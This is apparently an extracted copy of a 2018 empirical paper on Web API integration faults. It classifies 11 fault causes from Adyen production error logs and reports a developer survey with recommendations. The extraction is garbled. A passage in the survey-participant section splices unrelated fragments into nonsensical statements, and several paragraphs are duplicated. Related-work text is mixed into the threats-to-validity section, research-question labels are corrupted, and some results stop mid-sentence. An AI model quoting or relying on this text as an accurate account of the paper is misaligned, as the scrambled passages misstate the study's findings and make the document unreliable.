that 1) faults in API integration can be grouped into 11 general causes: invalid user input, missing user input, expired request data, invalid request data, missing request data, insufficient permissions, double processing, configuration, missing server data, internal and third party, 2) most faults can be attributed to the invalid or missing request data, and most API consumers seem to be impacted by faults caused by invalid request data and third party integration; and 3) insufficient guidance on certain aspects of the integration and on how to recover from errors is an important challenge to developers. CCS CONCEPTS • Information systems → Web services; Web applications; • Software and its engineering; KEYWORDS web engineering, web API integration, webservises. ACM Reference Format: Permission to make digital or hard copies of all or part of this work for personal or classroom use is granted without fee provided that copies are not made or distributed for profit or commercial advantage and that copies bear this notice and the full citation on the first page. Copyrights for components of this work owned by others than the author(s) must be honored. Abstracting with credit is permitted. To copy otherwise, or republish, to post on servers or to redistribute to lists, requires prior specific permission and/or a fee. Request permissions from permissions@acm.org. ICSE-SEIP ’18, May 27-June 3 2018, Gothenburg, Sweden © 2018 Copyright held by the owner/author(s). Publication rights licensed to Association for Computing Machinery. ACM ISBN 978-1-4503-5659-6/18/05 ... $15.00 https://doi.org/10.1145/3187519.3187537 1http://www.adyen.com 1 INTRODUCTION Service-oriented architectures are now more popular than ever. Companies and organizations increasingly offer their services through Web Application Programming Interfaces (Web APIs). Web APIs enable client developers to access third party services and data sources, and use them as building blocks for developing applications, e.g., Airbnb utilizes Google’s Calendar API to automatically insert bookings into the renter’s calendar, and Google Maps consumes Uber’s Ride Request API to offer Uber’s services as means of transportation in their maps application. The capabilities and complexity of Web APIs inevitably differ from service to service. Retrieving a list of followers for a user on Twitter requires a GET request including a single parameter, and posting a Twitter status update using the Twitter API takes a single parameter POST request. As the complexity of the actions increases, so do the possibilities of failure. For instance, Github’s Repo Merging API supports merging branches in a repository. In addition to the intended merge, other possible outcomes are a merge conflict, a missing branch error or a nothing to merge response. Adyen1, a multi-tenant Software as a Service (SaaS) platform that processes payments, offers an authorization request used to initiate a payment from a shopper, which takes up to 35 parameters. Multiple types of shopper interaction, and optional fields to optimize fraud detection and improve shopper experience lead to numerous failure scenarios. In addition to the happy path, the method can return at least 34 unique error messages to inform the API consumer that something has gone wrong. To make error handling for client developers easier, practitioners have written a variety of best practice guides and blogposts on API design [11] [21] [13] [18]. Apigee [1], a platform offering API tools and services for developers and enterprises, discusses error handling in multiple ebooks. Apigee’s error handling best practices focus on which HTTP status codes to use [2] and suggest to return detailed error messages for users and developers [3]. However, to our knowledge no research has been conducted on what type of errors occur in practice and what causes them to happen. Not only can this knowledge complement existing API design best practices, it can help improve API documentation and help developers understand the common integration pitfalls. The potential impact of API errors on API consumer applications is enormous. At the same time an understanding of API errors that occur in practice and their impact is missing. This gap of knowledge motivated us to investigate the domain of Web API errors. To this aim, we study the API error responses returned by Adyen web services which handle millions of API requests on a daily basis. We analyze 2.43 million error responses, which we extract from the platform’s production logs, discover the underlying faults, and group them into high-level causes. In addition, we survey API consumers about their perceptions on the impact and how often they observe such cases in their APIs, as well as practices and challenges they currently face when it comes to integrating to Web APIs. Finally, we provide API developers and consumers with recommendations that would help in reducing the number of existing integration errors. Our results show that (1) faults in API integration can be grouped in 11 causes: invalid user input, missing user input, expired request data, invalid request data, missing request data, insufficient permissions, double processing, configuration, missing server data, internal and third party. Each cause can be contributed to one of the four API integration stakeholders: end user, API consumer, API provider, and third parties; (2) most faults can be attributed to the invalid or missing request data, and most API consumers seem to be impacted by faults caused by invalid request data and third party integration; and (3) API consumers most often use official API documentation to implement an API correctly, followed by code examples. The challenges of preventing problems from occurring are the lack of implementation details, insufficient guidance on certain aspects of the integration and insights in problems and changes, insufficient understanding of the impact of problems, missing guidance on how to recover and a lack of details on the origin of errors. The main contributions of this work are as follows: (1) A classification of API faults, resulting in 11 causes of API faults, based on 2.43 million API error responses of a large industrial multi-tenant SaaS platform (Section 4.1). (2) An empirical understanding of the prevalence of API fault types in terms of the number of errors and impacted API consumers (Section 4.2). (3) An initial understanding of the impact of each cause as experienced by API consumers as well as their observations on current challenges during API integration (Section 4.3). (4) A set of recommendations for API providers and API consumers to reduce the impact of API related faults (Section 5.1). 2 BACKGROUND: UNDERSTANDING THE WEB API ENVIRONMENT An API integration can involve up to four different stakeholders, that all influence the interaction between the API and its consumer. As a result, each of these stakeholders can cause the API to return with an error that possibly leads to a failure in the consumer’s application. In this section, we give an overview of the API environment, the parties involved and API error related terminology, to clarify the differences and nuances that could lead to confusion. In a typical integration with an API, two stakeholders, or parties, are involved. On one side the API provider, offering their services by exposing an API, and on the other the API consumer, utilizing the services offered by communicating with the API. The API provider may optionally itself be connected to third party services behind the scenes in order to provide the intended functionality. For instance, an API offering stock data may itself be connected to different stock exchanges to obtain the latest stock prices. We deliberately refer to API consumer, instead of API user, to leave room for the term end user. The API consumer may optionally provide an application used by its customers, who indirectly make use of the API’s services. These end users supply information, while using the application, that is used as request data for the API. For example, Google Maps users are given the option to choose Uber as means of transportation when searching for directions. Indirectly they are supplying input to the Uber API, which locates nearby drivers and estimates the cost for the trip. In the system under study, the API provider, Adyen, provides its payment services through its API. The API consumer is the merchant processing payments using the Adyen solution (e.g., a store). The end users are shoppers, who use the merchant’s services to buy goods or services. Finally, third parties connected to Adyen typically include banks, schemes, and issuers. Each of the stakeholders in the API stakeholder overview can, by introducing a fault, potentially cause an erroneous response to be returned by the API, which if unexpected can result in problems for the application. We provide an overview of the integration environment containing the involved stakeholders and the relation between faults, errors and failure in Figure 1. In case the API is indirectly in use by customers of the API consumer, the end user can, by supplying invalid information, cause the API to return an error. The API consumer, on the other hand, may have implemented the API incorrectly, which can result in requests with a specific input to be rejected by the API. The API provider may have a bug in its system, which could, for instance, cause requests to fail on a specific input. Lastly, when a third party service fails, the API provider may decide to return an error to the API consumer. 3 RESEARCH METHODOLOGY The goal of this study is to understand the faults that occur in API integration that can potentially result in production problems for consumers of an API. To this aim, we propose the following research questions: **RQ1. What type of faults are impacting API consumers?** Translating the understanding of faults in one API integration to API integrations in general is difficult, because every API has its own use cases, specific methods and corresponding errors. To enable generalization of the results we identify general causes of faults that can occur in an API integration. RQ2. **What is the prevalence of these fault types, and how many API consumers are impacted by them?** The answer to this question provides insights into the frequency of each type of fault and the impact in terms of number of API consumers. API designers can leverage the information of what type of fault impact the user the most when designing an API to lower the probability that these faults take place and result into problems. In addition, the knowledge will help identify what aspects of integration are more difficult to get right, which therefore require more attention in terms of, for instance, documentation. RQ3. **What are the current practices and challenges to avoid and reduce the impact of problems caused by faults in API integration?** Understanding what type of faults occur in API integrations, how often these faults occur and their impact is not enough to determine how the impact of production problems can be reduced. An understanding is needed of the current practices used to avoid and reduce problems, before recommendations for improvements can be made. Similarly, an understanding of the current challenges faced by API consumers is needed to identify areas of improvement. To answer the RQs, we collect and analyze data from two different sources: over 2 million API error response logs from Adyen’s production services, and a survey with API consumers. We use this first batch of data to answer the types of fault in Web API integration as well as their prevalence. After, we challenge our findings by means of a survey with 40 API consumers. In the following, we detail each data collection mechanism. ### 3.1 Analysis of the API error response logs The data extraction approach can be depicted into four steps: (1) We extract API error responses from production log data to obtain unique API errors, (2) we manually analyze each unique error message in context of the web service and API method to identify unique faults, (3) the time span covered by the data set is verified to cover enough data, and (4) we derive a set of causes that explain the API integration failures. The logs of the system under study contain information about everything that happened in the production environment. Among the logs are the API requests and corresponding responses. Using domain knowledge of the system, we identified queries to capture the erroneous API response log messages from the entire set of log messages. The data set we use contains 28 days of data and 2.66 million API error responses. To make sure 28 days would provide enough data for the analysis, we measured the amount of new information each new day was bringing to the dataset. We find that, after 14 days of data, at most 2 new faults are identified per day with the number decreasing as more days pass. For this reason we conclude that the most common and therefore impacting faults in our data set are discovered within 14 days and therefore consider the 28 day data set to cover a sufficient time span. In Figure 2, we show the amount of new information that each day aggregates to the dataset. As the same error can happen more than once, we identify the unique errors (i.e., unique erroneous API response messages) that have happened in the dataset. However, the error messages alone are not enough to explain the faults. There are messages that indicate one fault, but in practice have a different meaning. For instance, “Unsupported currency specified”, appears to be a configuration mistake or an invalid input fault. However, this specific error is caused by a missing value. Other messages, e.g., “Internal error”, are too ambiguous to categorize in the first place. Thus, to reduce the number of unique messages with multiple explanations, we add more context to the unique error messages. To do so, we use the corresponding API method and web service that caused the error. For instance, the message “Invalid amount specified” has multiple explanations that depend on the API method used. Adding context allows for more granularity during analysis. We end up with 363 different errors to analyze. In practice, we observed that the analysis of these errors are intensive manual tasks, i.e., for each error, we had to comprehend the failure, inspect the source code, and talk to the developers of the system. Thus, we consider errors that impacted 10 API consumers or more. Following this approach, we analyzed 89 of the 363 errors, which covers approximately 2.44 (91.3%) of the 2.66 million erroneous API responses. After analyzing each of them, we found 69 different explanations for these 89 errors (we refer to them as fault cases [FC01, FC09] and they can be found in our appendix [4]), which we use as an input to determine the high-level causes. Identifying the causes and assigning each of them to a fault is an iterative process, based on a detailed qualitative analysis of the fault cases. Investigating a subset of faults gives the intuition needed to define initial causes, which can be assigned to most of the annotated faults. During further analysis, if a fault does not fit into one of the existing causes, we define a new cause. A cause that is too generic may have to be split up into two or more causes, while a cause that is too specific may be joined with another cause. Categorization can therefore not be described by a predefined set of steps, but is guided by our understanding of the problem domain, and the actual analysis of the cases at hand. After assigning a cause to each fault, we iterate once more over all faults to check that all causes are accurate. Following this procedure we obtain a set of causes that describe faults in API integration in general. ![Figure 2: The number of newly identified faults for each interval for compared to the previous interval.](image-url) To verify the accuracy of the categorization, we asked a specialist in API integration from Adyen to check a subset of the cause assignments. As our list was already randomized, the specialist validated the first 50% assignments. In case the specialist does not agree with the cause, the difference is discussed until agreement is reached. Using this approach, we verify that the causes are understandable and reduce the possibilities of mistakes. At the end, we derived 11 causes that explain faults in Web API integration. In practice, we observed that, due to unclear error messages, about half of the faults originating from error messages that have two or more different causes. Propagating these causes to the entire 2.43 million error messages would require analyzing each case in isolation. Thus, we are not able to perfectly estimate the prevalence of each cause; rather, we provide lower and upper bounds. The former is calculated by only counting the number of times that a cause unambiguously explains the error (i.e., the error message was clear enough to identify the exact cause) and ignoring the number of times we were not able to precisely identify that the cause was the root cause. The latter is calculated by counting all the times that cause was involved in an error (unambiguously or not). 3.2 Survey with API consumers We challenge the 11 derived causes by testing them outside the scope of the system under study. To this end, we survey API consumers that have experience with problems related to API integration. We ask them for each cause whether they have experienced a situation. For instance, we would like the participants to report their experience of what causes API errors to occur, and not what they think causes these errors in general. We pre-tested the survey with five participants to make sure the questions are understandable and to remove possible ambiguities. The participants were asked to read the questions aloud as well as what they were thinking when answering the questions. This helped us understand the participants’ reasoning and identify problematic situations. We posted the survey on the following programming communities: Code Ranch’s Web Services forum, Hackernews and Reddit’s subreddits programming (815,000 subscribers), Webdev (160,000 subscribers), API (600 subscribers) and WebAPIs (235 subscribers). Although the number of subscriber for the first two subreddits is high, the topics are very general, so the expected number of responses from these is relatively low compared to the more specific forums. To increase the response rate, we additionally resorted to non-programming specific media and personal contacts. The survey was shared with the general public on Twitter by two colleagues; one with primarily academic followers (2500) and the other with a mix of academics and practitioners (4600 followers). In total, the posts were retweeted 25 times. On LinkedIn our post was viewed approximately 1000 times and was shared by two connections. Three companies in industry were contacted via personal contacts of which one was Adyen, the company under study. Lastly, the first author reached out to personal contacts that match the target audience. The survey has been online for three weeks and a total of 40 qualified participants out of 70 who answered at least 1 question. We decided to consider partial responses in the results as well, but only those participants that answered questions that are not background related; 11 out of the 40 participants provided partial responses. The survey can be found in our online appendix [4]. 3.3 Characterization of Survey Participants On average, the respondents have over 10 years of development experience and 5 years of API integration experience. 13 of the developers were individually responsible for the API integration and 27 worked in a team of two or more developers. 95% of the respondents answered the survey based on an application that they worked on in a professional setting. The remaining 5% used an API in a hobby project, which however was used in production. According to 28% of the participants, the API they consume can be considered complex; 22% of them consider the API not complex, and 50% were neutral. 13 APIs used by the participants were data management related. For instance, providing data about products and orders, and managing financial and account data. Payment related APIs were considered 6 times. Even though many respondents are from Adyen, a payments company, only 3 of the respondents considered an payment related API. Other APIs that the participants integrated with are used for authentication, commerce, project management, geocoding and notifications, such as SMS services. We observed inputs that (1) do not match a predefined list of API consumer, and the API provider and the third party stakeholder. Invalid user input (FC-16, FC-36). In practice, the expected values or ranges, e.g., year should be an integer, month should be between 1 and 12 (FC-06, FC-22, FC-23, FC-35), (2) do not match the expected type or format, e.g., invalid country code, and month should not be too far into the past. If a shopper takes too much time an invalid information, e.g., passing value 72 instead of 21 (FC-01, FC-68), (3) do not contain the expected length, e.g., CVC code should have three digits (FC-16, FC-36). In practice, Invalid user input can be caused by a user that is not aware that certain input is not allowed. Expired request data. Expired request data faults occur when the request is not handled in time. This occurs when the request contains a timestamp that defines a timeframe that the server has to handle the request (FC-19, FC-67). In Adyen’s case, a timestamp is generated when a shopper starts a transaction. When the request comes in, the system checks whether the start of the transaction is not too far into the past. If a shopper takes too much time an expired request data fault translates to an error being returned. Invalid request data. Invalid request data faults are caused by input that cannot be handled by the API. There is a multitude of different reasons for such a fault to occur. We observe rounding problems, e.g., passing value 72.20 instead of 72.21 (FC-01, FC-68), functionality not available for that combination, e.g., chosen bank does not support recurring payments (FC-13, FC-54, FC-55, FC-66), invalid information, e.g., merchant does not exist (FC-41, FC-43, FC-47, FC-51), bad encoding, e.g., wrong URL encoding (FC-14), bad format or data outside a list of acceptable values, e.g., amount should be greater than zero (FC-20, FC-29, FC-30, FC-31, FC-32), and using test data into production environment, e.g., use testing payment reference in production (FC-44). This is similar to the mistake made by the end user causing an invalid user input fault, however, in this case, caused by the API consumer. Missing request data. Missing request data faults are similar to invalid request data faults. However, in this case the API consumer neglects to send in information that is required for the intended action. Also in this case we decided to distinguish between invalid and missing request data. We reason that the mistake of not supplying required information is of a different nature than making <table> <thead> <tr> <th>Stakeholder</th> <th>Cause</th> <th>Explanation</th> <th>Fault Cases</th> </tr> </thead> <tbody> <tr> <td>End user</td> <td>Invalid user input</td> <td>A fault introduced by invalid input by the end user of the application</td> <td>FC6, FC15, FC19, FC22, FC23, FC33, FC34, FC35, FC36, FC37, FC45, FC63, FC64</td> </tr> <tr> <td>End user</td> <td>Missing user input</td> <td>A fault introduced by missing input by the end user of the application</td> <td>FC3, FC4, FC5, FC7, FC8, FC9, FC17, FC21, FC38, FC61</td> </tr> <tr> <td>End user</td> <td>Expired request data</td> <td>The input data was no longer valid at the moment of processing</td> <td>FC-19, FC67</td> </tr> <tr> <td>API consumer</td> <td>Invalid request data</td> <td>A fault introduced by invalid input caused by the API consumer</td> <td>FC1, FC13, FC14, FC20, FC29, FC30, FC31, FC32, FC41, FC43, FC44, FC47, FC51, FC54, FC55, FC66, FC68</td> </tr> <tr> <td>API consumer</td> <td>Missing request data</td> <td>A fault introduced by missing input caused by the API consumer</td> <td>FC10, FC25, FC27, FC28, FC39, FC46, FC48, FC52, FC58, FC59, FC60, FC65</td> </tr> <tr> <td>API consumer</td> <td>Insufficient permissions</td> <td>Not enough rights to perform the intended request</td> <td>FC40, FC49, FC50</td> </tr> <tr> <td>API consumer</td> <td>Double processing</td> <td>The request was already processed by the API</td> <td>FC11, FC18, FC69</td> </tr> <tr> <td>API consumer</td> <td>Configuration</td> <td>A fault caused by missing/incorrect API settings</td> <td>FC26, FC53</td> </tr> <tr> <td>API consumer</td> <td>Missing server data</td> <td>The API does not have the requested resource</td> <td>FC56, FC57</td> </tr> <tr> <td>API provider</td> <td>Internal</td> <td>An internal fault caused by the API</td> <td>FC2, FC12, FC62</td> </tr> <tr> <td>Third party</td> <td>Third party</td> <td>A fault caused by a third party</td> <td>FC24, FC42</td> </tr> </tbody> </table> Table 1: The 11 causes of API faults, their related stakeholder, and fault cases (FC) assigned to the cause. 4 RESULTS 4.1 RQ1. What type of faults are impacting API consumers? In Table 1, we show the 11 derived causes. Two causes, related to user input, can be contributed to the end user, who is also responsible for expired request data faults. Most of them are caused by the API consumer, and the API provider and the third party stakeholder each match one cause. In the following, we detail each of the causes. Invalid user input. Invalid user input regards requests that fail because an end user supplied input that cannot be used to complete the intended action. The invalid information is forwarded by the API consumer to the API. There are multiple types of input invalidity. We observed inputs that (1) do not match a pre-defined list of expected values or ranges, e.g., invalid country code, and month should be between 1 and 12 (FC-06, FC-22, FC-23, FC-35), (2) do not match the expected type or format, e.g., year should be an integer value (FC-15, FC-33, FC-34, FC-37, FC-45, FC-63, FC-64), (3) do not contain the expected length, e.g., CVC code should have three digits (FC-16, FC-36). In practice, Invalid user input can be caused by a user that is not aware that certain input is not allowed. Missing user input. Missing user input is strongly related to invalid user input. In this case however, the end user neglects to fill in required information, which causes the subsequent request to fail. We decided to distinguish between missing and invalid user input, because the nature of the mistake is different. An end user that does not fill out a field either forgets to or is unaware that the field is required. This is different from invalid input where the user supplies incorrect information. We observed cases such as missing payment details, such as bank information, card holder name, CVC, expiry month, IBAN, credit card (FC-03, FC-09, FC-17, FC-21, FC-38, FC-61), as well as billing information, such as city, state, country, and street of the buyer (FC-04, FC-07, FC-05, FC-08). Expired request data. Expired request data faults occur when the request is not handled in time. This occurs when the request contains a timestamp that defines a timeframe that the server has to handle the request (FC-19, FC-67). In Adyen’s case, a timestamp is generated when a shopper starts a transaction. When the request comes in, the system checks whether the start of the transaction is not too far into the past. If a shopper takes too much time an expired request data fault translates to an error being returned. Invalid request data. Invalid request data faults are caused by input that cannot be handled by the API. There is a multitude of different reasons for such a fault to occur. We observe rounding problems, e.g., passing value 72.20 instead of 72.21 (FC-01, FC-68), functionality not available for that combination, e.g., chosen bank does not support recurring payments (FC-13, FC-54, FC-55, FC-66), invalid information, e.g., merchant does not exist (FC-41, FC-43, FC-47, FC-51), bad encoding, e.g., wrong URL encoding (FC-14), bad format or data outside a list of acceptable values, e.g., amount should be greater than zero (FC-20, FC-29, FC-30, FC-31, FC-32), and using test data into production environment, e.g., use testing payment reference in production (FC-44). This is similar to the mistake made by the end user causing an invalid user input fault, however, in this case, caused by the API consumer. Missing request data. Missing request data faults are similar to invalid request data faults. However, in this case the API consumer neglects to send in information that is required for the intended action. Also in this case we decided to distinguish between invalid and missing request data. We reason that the mistake of not supplying required information is of a different nature than making a mistake by supplying incorrect input. We observe missing cryptographic data (FC-10, FC-25), and different business related data (FC-27, FC-28, FC-39, FC-46, FC-48, FC-52, FC-58, FC-59, FC-60, FC-65). **Insufficient permissions.** Insufficient permissions faults are caused by API consumers that attempt to use an endpoint or make use of a resource, while they are not allowed to do so. We find users making this mistake because they attempt to use the production services, while they are not yet through the process of obtaining the permissions for this (FC-40, FC-50), or waiting for the service to be properly configured (FC-49). We also see API consumers still interacting with the API, while their contract has been ended and therefore their permissions have been revoked. **Double processing.** Double processing faults are caused by API consumers that send in a request more than once. The API under study is designed to be idempotent; sending in the same call repeatedly will produce the same result. Double processing faults should therefore not be possible. However, in case of attempting to repeatedly delete the same remote object, a double processing faults occurs because the reference to this object can no longer be found, e.g., contracts (FC-11) and payment related objects (FC-18, FC-69). **Configuration.** Configuration faults are caused by incorrect configuration of the API consumer account. The API consumer assumes that certain functionality is set up for their account, however in reality it is configured incorrectly or not set up at all, e.g., configuration for installments (FC-26) or specific payment methods (FC-53). **Missing server data.** Missing server data faults happen when the API consumer asks for data that used to exist, but does not anymore, as it was updated, removed or disabled in the past (FC-56, FC-57). **Internal.** Internal faults occur when the API provider is unable to handle an incoming request for an unanticipated reason. This can be because of a bug, due to the system being unable to handle a specific input or unexpected API consumer interaction. Data related replication issues between internal components in the system can result in new data resources to not be available immediately on all servers in a distributed API server architecture (FC-02, FC-12). We also observe internal failures in cryptographic routines (FC-62). **Third party.** A third party fault can result in an API error when the API provider makes a request that involves the API provider to make use of a third party (e.g., a bank), which does not respond or returns an error (FC-24, FC-42). In this case the request failed and the consumer is notified by means of an error. In Figure 3, we show how often survey participants experienced production problems with the API due to each of the 11 causes. Missing server data and configuration related problems were experienced relatively more often than other problems for the participants. Problems caused by the API provider and third parties, internal and third party fault related problems respectively, are relatively experienced more than other problems caused by the API consumer or end user. It is to be noted that for third party faults 10 out of 34 respondents did not know whether these problems occurred or regarded the cause as not applicable. Missing request data and missing user input faults both result into less problems than invalid request data and invalid user input faults. The latter two are experienced relatively by most participants. Expired request data and double processing related problems are not experienced by over half of the participants. Several participants added additional causes to the 11 we propose. Four participants mentioned that they experienced errors because the API was not responding. We summarize these issues as API downtime, which we consider part of the internal cause. Furthermore, two participants experienced problems caused by hitting the API requests limits. We regard these to be related to faults in the insufficient permissions cause. Namely, the API consumer is not allowed to make more requests. **RQ1:** Faults in API integration can be grouped in 11 causes: invalid user input, missing user input, expired request data, invalid request data, missing request data, insufficient permissions, double processing, configuration, missing server data, internal and third party. **RQ2:** What is the prevalence of these fault types, and how many API consumers are impacted by them? In Table 2, we show the number of unique faults that occur in each of the 11 causes found during manual analysis. As aforementioned, due to ambiguity we are not able to present the exact percentage of errors and impacted consumers. For this reason, we show the estimated percentage of corresponding API error responses and estimated percentage of impacted consumers for each cause. In four causes of faults no ambiguity was present, hence the exact percentages are given instead of a range. Note that the total percentages for the lower and upper bound do not add up to 100% due to the estimation in the total number of errors, and to the fact that the same consumer may generate different faults. consumers. Double processing related error in comparison are also caused by 3 faults, but occurred 36.0% of the time corresponding to 875,000 errors for 12.3% of the consumers. Two configuration faults cause more than 400,000 errors (16.7%) for 19.9% to 21.4% of the consumers. This is similar to the missing request data, with the difference that this cause has 12 unique faults. Finally, 1.5% missing server data fault related error responses are given back to the API consumer, which is a relatively small amount compared to the other causes for this stakeholder. The number of impacted consumers, however, is similar to other causes. The API provider and third party stakeholder both experience errors in one category each, internal faults and third party faults respectively. The number of unique faults caused by these stakeholders is small compared to the end user and API consumer. Third party faults however impact more API consumers, which is estimated to be between 319 and 682, or 21.8% and 46.6%. In addition, in Figure 4, we show the perceptions of survey participants' on the impact of each cause. We observe that: (1) Internal and third party related problems, caused by the API provider and third parties, are experienced as most impactful on production applications; (2) Problems originating from the end user, such as invalid user input and missing user input, have a relative small impact on the applications using the API; and (3) Interestingly, double processing related problems seem to have either no impact, or relatively much impact compared to the other causes. 4.3 \textit{RQ$_i$}. What are the current practices and challenges to avoid and reduce the impact of problems caused by faults in API integration? To understand how API consumers obtain the knowledge necessary to integrate with an API we asked them how often they used different information sources. Official API documentation is by far used the most. 74% of the respondents indicated to be using this source of information often or very often. Only 10% did not use official API documentation when integrating with the API they selected during the survey. Code examples are second most used with 44% of the participants using them often or very often. About one-third of the participants uses them sometimes. Questions and answer websites are used never or rarely by 42% of the participants, while the number of participants that uses this information source very often is relatively low with 10%. The API provider support team is used the least with only 18% of the participants using this source often or very often. In addition to the four proposed information sources the participants mentioned other sources of information. Four participants mentioned that they used a trial and error approach on the API to... discover what is possible and what is not. Three respondents had access to the API’s source code or used the schema definition of the web service to understand the workings of the API. Finally, two participants used the source code of existing external libraries that wrap the API to understand how to use the API. When it comes to preventing problems that they experienced with the API, 13 (of a total of 18) mentioned the documentation was insufficient. Common implementation scenarios could help prevent problems, instead of only stating the different options for API calls. The restrictions of calls and parameters should be more clearly documented. The API provider should identify the most common API mistakes and describe how to prevent them. In addition, more details on error codes should be given and the edge cases should be highlighted and better explained. Two participants mentioned the need of an API status page to inform the API consumer of any outages. On call support for any issues was a suggested improvement by two more participants. The participants suggested both more informative error messages as well as a categorization of errors based on their similarities. Furthermore, the respondents mentioned the importance of an upgrade policy of the API and the usefulness of more code examples to illustrate the different API calls. Last, one participant suggests the API provider to set up a testing environment that is capable of returning all possible API calls. Lastly, one participant suggests the API provider to set up a testing environment that is capable of returning all possible API calls, which allows the API consumer to properly test and handle these responses. A subset of the participants (n = 15) elaborated on the challenges they face in error handling. One of the main difficulties is understanding the impact of API errors. Three impact perspectives were mentioned: an implementation perspective, business perspective and end user perspective. Not knowing the details and impact of an error makes it difficult from an implementation perspective to know what the request did and did not do. A participant exemplified: “You send a batch of 20 objects to be saved, but an error gets thrown. However, you don’t know if none of them was saved or all of them but one.” From a business perspective it is experienced as difficult to understand the business impact of the error. The error may explain that a parameter is invalid, but the consequences of this remain unclear. Finally, communicate errors to the end user is also experienced a challenge: “Translating the messages to something actionable by the end user.” Another challenge faced in handling errors is the appropriate way to recover. Difficulties experienced include insufficient clarity and documentation about the right way to recover from a given error: “Often errors have no clear recovery option or even worse, do not clearly indicate what’s wrong.” Handling errors is difficult when the different flows the application should take given the API response are not clear. This is even more difficult when multiple related API calls are subsequently made and can fail with different errors. The survey participants (n = 29) also apply different strategies to detect problems in their integration. The end user detects problems in the application related to the API integration for 23 respondents. Log analysis is second most effective in detecting problems with 19 respondents. Monitoring dashboards have detected issues for 13 respondents and both alerts, such as SMS or email, and API integration tests worked for 9 respondents. Five respondents had additional mechanisms in place, among which are “continuous live smoketesting”, “manual tests in production”, and monitoring API tools that can detect downtime and schedule API test cases, such as Runscope Radar. **RQ5:** API consumers most often use official API documentation to implement an API correctly, followed by code examples. The challenges of preventing problems from occurring are the lack of implementation details, insufficient guidance on certain aspects of the integration, insufficient understanding of the impact of problems, and missing guidance on how to recover from errors. ### 5 DISCUSSION In this section, we provide developers with recommendations that we derive based on our findings (Section 5.1). Finally, we discuss the possible threats to the validity of this work and actions we took to mitigate them (Section 5.2). #### 5.1 Recommendations We observed that a great challenge for both API providers and consumers is indeed the documentation; providers need to keep it up-to-date, while consumers need to understand it. The same challenge has been observed by Robillard et al. [17], where authors propose API documentation to have clear intent, code examples, matching APIs with scenarios, discuss the penetrability of the API, and to have a clear format and presentation. Our findings suggest that an important feature of documentation is regarding the possible errors an API may return. We therefore suggest documentation to clearly state which error codes can be returned by the API and in what circumstances it can happen. The API provider should enrich API error responses with actionable information. An error type allows for generic error handling for groups of errors, a handling action indicates the right action for the API consumer to take to deal with the error, and a user message can inform the end user of the system about the error and actions to proceed. In addition, API providers should also make explicit which errors are ‘retriable’, i.e., where users may try again, and which cases users have no way of recovering from the error. As recovering from errors is a fundamental part of the API consumer’s logic, we suggest API providers to offer easy-to-use test environments for integrations, where consumers can exercise not only the happy paths, but also the recovering paths. API consumers, on the other hand, should make sure that their application handles all error codes that are returned by the provider. Finally, error messages are commonly logged by the API provider. Such logs are vital for future inspection and debugging. We suggest API developers to provide consumers with their logs. Toolmakers should step in and build dashboards that provide live insights about the consumers’ API usage and, more specifically, about their errors. #### 5.2 Threats to validity In this section, we discuss the possible limitations of this work and our approach to mitigate them. We distinguish between the internal and external validity of our results. Web APIs and argue in favor of corresponding research opportunities. Wittern et al. [27] identified three challenges for developers calling APIs as well. Robillard et al. [15, 17] also investigated the obstacles of learning traditional offline APIs by surveying developers at Microsoft. Similar to our results, Robillard found most respondents use official documentation to learn APIs with code samples as the second most used source of information. The learnability of an API can be affected by the overall usability of the API itself. Stylos et al. [22] find that if API providers take the effort to refactor their APIs to make them more usable, this can help reduce the errors that could occur due to incorrect usage of the API. One such example shown by Ellis et al. [6] is the refactoring of the factory pattern in an API to the usage of the constructor directly. More recently, Stylos and Myers [12] have suggested that API usability techniques are not limited to the world of offline APIs, but are applicable to the world of web APIs as well. The evolution of an API has an impact on the API clients as well. Linares-Vásquez et al. [10] have shown that breaking changes in Android APIs can have a negative impact on the rating of an Android app. Sawant et al. [19] conducted a study of 25,567 Java projects to show how deprecation of an API feature can impact an API client. Robbes et al. [14] study the ripple effect of API evolution in the entire SmallTalk ecosystem and show that deprecation of a single API artifact can have a large ranging impact on the ecosystem. In the case of web APIs, evolution of an API can have a major impact too. Espinha et al. [8] explored the state of Web API evolution practices and the impact on the software of the respective API consumers. The impact of API changes on the clients’ source code was found to depend on the breadth of the API changes and the quality of the clients’ architectural design. Suggestions for API ### 6 RELATED WORK Wittern et al. [27] identified three challenges for developers calling Web APIs and argue in favor of corresponding research opportunities to support API consumers: 1) API consumers have no control over the API and the service behind it, both of which may change, in contrast to a traditional local library. 2) The validity of the Web API request, in terms of URL, payload and parameters, is unknown until runtime. When using a local library the compiler can check whether the call conforms to the library’s API interface. Efforts to solve this challenge can help to reduce faults in the following categories we identified: invalid user input and invalid request data. 3) The distributed nature of the API connection comes with a set of issues concerning availability, latency and asynchrony. A different architecture or additional logic may be required to handle these issues. Suter and Wittern [23] use API usage logs from 10 APIs to infer specifications based on API URLs and parameters using classification techniques to tag and detect parameters. The conclusion is that inferring web API descriptions is a difficult problem that is limited mostly by incomplete or noisy input data. Sohan et al. [20] apply a similar approach where API requests and responses are used to generate documentation. Using actual requests and responses the tool is able to include examples in addition to the documentation. The authors identified undocumented fields in 5 out of 25 API actions for which they generated documentation. However, in this work the precision of the generated documentation is not validated and compared to a ground truth making it difficult to see the usefulness of the proposed generator. Bermbach and Wittern [5] performed a geo-distributed benchmark to assess the quality of Web APIs, in terms of performance and availability. The authors find a great variety in quality between different APIs. They make suggestions on how API providers can become aware of these problems by monitoring, and can mitigate them by suggesting architectural styles. This work discusses an angle of API related problems which we were not able to cover, as our work only considers API requests for which API consumers received an API response. We do however cover third party unavailability as this results into third party errors for the API consumer. Wittern et al. [26] attempt to detect errors by statically checking API requests in JavaScript to overcome the fact that traditional compile-time errors are not available for developers consuming APIs. Their static checker aims to check whether the API requests in the code conform to the specifications that were made using the Open API specification. The authors report a 87.9% precision for payload data and a 99.9% precision on query parameter consistency checking. A vast amount of research has been conducted in the field of traditional offline APIs, some of which can be relevant to the Web APIs as well. Robillard et al. [16] provide a survey on automated property inference for APIs. The authors state that using APIs can be challenging due to hidden assumptions and requirements, which is also found in this work. Robillard et al. [15, 17] also investigated the obstacles of learning traditional offline APIs by surveying developers at Microsoft. Similar to our results, Robillard found most respondents use official documentation to learn APIs with code samples as the second most used source of information. Internal validity. Internal validity is concerned with how consistent the result is in itself. Factors that cannot be attributed to our technique, which can have an influence on the results, are a potential threat to validity: (1) The causes were derived manually and could therefore have been subject to bias or misinterpretation. To reduce this threat we worked together closely with the Adyen development and technical support team to avoid misunderstandings. (2) To discover possible multiple explanations of a fault, we analyzed the error messages for several API consumers. However, it is possible that a fault remained undiscovered because it occurred infrequently. This has a 